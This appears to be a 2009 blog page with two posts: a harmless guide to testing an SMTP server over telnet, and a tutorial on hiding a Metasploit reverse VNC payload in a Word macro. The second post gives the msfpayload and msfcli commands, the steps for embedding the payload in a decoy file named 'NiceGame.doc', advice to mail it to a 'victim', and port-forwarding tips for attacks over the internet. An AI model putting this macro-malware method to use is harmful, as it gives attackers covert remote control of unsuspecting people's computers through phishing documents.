Saturday, August 1, 2009

How can I test my SMTP service ?

You can use TELNET to test your SMTP service. SMTP uses port number 25, so in order to use telnet to open an SMTP session with an Exchange server we use the command

telnet test.server 25
If the connection is successful, we should see a banner and a command line interface. You may consult RFC 821 for SMTP commands,

220 test.server Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Mon, 15 Sep 2009 20:50:07 +0210
helo test.server
250 test.server Hello []
mail from:
250 2.1.0 OK
rcpt to:
250 2.1.5
354 Start mail input; end with .
subject: test mail
Hi Sam,
I'm sending email using TELNET.
250 2.6.0 Queued mail for delivery
221 2.0.0 test.server Service closing transmission channel
Connection to host lost.
Press any key to continue...

The above techniques can also be used for NULL sender identity check and SMTP Open Relay.

Sunday, May 24, 2009

Metasploit & Reverse VNC Injection hidden in word file -PoC (Proof of Concept)

Hello friends, today I'm going to show how to use Metasploit v3.2 payload feature for Reverse VNC Injection, The steps are given below,

Lets begin

1) Create a payload for ReverseVNCInjection with Metasploit's msfpayload utility,
./msfpayload windows/vncinject/reverse_tcp LHOST= V > exploit.bas

2) Copy exploit.bas file to another windows system to make .doc file,
Create New doc file --> write some text into it, then do the following ,
go to tools–>macro–>visualbasic editor.
then go to File–>import file–> and choose the exploit.bas and save it with a name ex: NiceGame.doc
Now file is ready, send this file to victim via mail or by some other ways,

3)Now in Backtrack-4, type this command
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

On target windows system, when victim open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the Backtack.

Note : There is no required of VNC installed in the Victim PC; you can also do this in WAN also, only thing is that you should port forward your 4444 port in modem or router.

Original Video links for the above guide,